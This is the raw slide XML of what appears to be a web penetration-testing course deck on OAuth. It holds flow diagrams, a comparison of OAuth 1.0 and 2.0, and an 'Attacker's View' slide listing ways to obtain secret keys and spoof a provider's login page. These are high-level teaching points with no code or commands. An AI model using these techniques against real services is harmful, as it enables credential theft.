              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="7" idx="2"/>
            <a:endCxn id="13" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1666879" y="3248894"/>
            <a:ext cx="41371" cy="1464294"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3073816" y="5434756"/>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13</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13"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450" y="4713188"/>
            <a:ext cx="609600" cy="871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1880394"/>
            <a:ext cx="609600" cy="871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0854" y="1877219"/>
            <a:ext cx="609600" cy="871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TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2624652" y="2211812"/>
            <a:ext cx="2688557" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, you can use the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>request token now.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3610010" y="4146247"/>
            <a:ext cx="2442646" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Twitter, exchange this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>request token for an </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>access token.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3610010" y="5371239"/>
            <a:ext cx="2165502" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Twitter, post this to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bob’s feed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6498384" y="3479925"/>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12</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6771443" y="3743662"/>
            <a:ext cx="2310248" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, here is your</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>access token and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Secret.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6535026" y="4923108"/>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14</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6879384" y="5161910"/>
            <a:ext cx="1721946" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, Done.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14714147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1.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OAuth 1 makes extensive use of signatures to validate requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However the complexity of generating and validating signatures caused enough complaints that a second version was created</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Doesn’t require SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tokens do not expire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Depends on the token secret remaining secret for security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26461889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2.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242887" y="1176750"/>
            <a:ext cx="8686800" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OAuth 2.0 was created in response to complaints about the complexity of 1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires SSL for all communications to generate a token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Signatures are not required for API calls once the token is generated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSL strongly recommended</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only one token is sent in an API call and no signatures sent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tokens have an expiration time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41571513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OAuth Requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3697514" y="4972956"/>
            <a:ext cx="4458009" cy="673147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1175657" y="2055585"/>
            <a:ext cx="4369103" cy="2044842"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6054604" y="2540242"/>
            <a:ext cx="2014494" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>OAuth 1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354111" y="4798864"/>
            <a:ext cx="2014494" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>OAuth 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38131903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Attacker's View of OAuth</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1000900"/>
            <a:ext cx="8686800" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Want to find out the secret key for OAuth 1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Insecure storage of the key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Intercept the generation of request and access tokens (No SSL required)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Vulnerabilities in the service provider application may disclose the secret key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>OAuth 1.0 tokens never expire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Security of OAuth is highly dependent on the consumer application to get the implementation right</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Deployment of OAuth 1.0 vs. 2.0 is mixed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some sites continue to use 1.0 while others have moved to 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Check for information leakage in JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sensitive information such as the secret key may be present</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Spoofing the site is possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Evil consumer application pops up something that looks like the intended service provider web site with the intent of stealing username and password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17220279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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
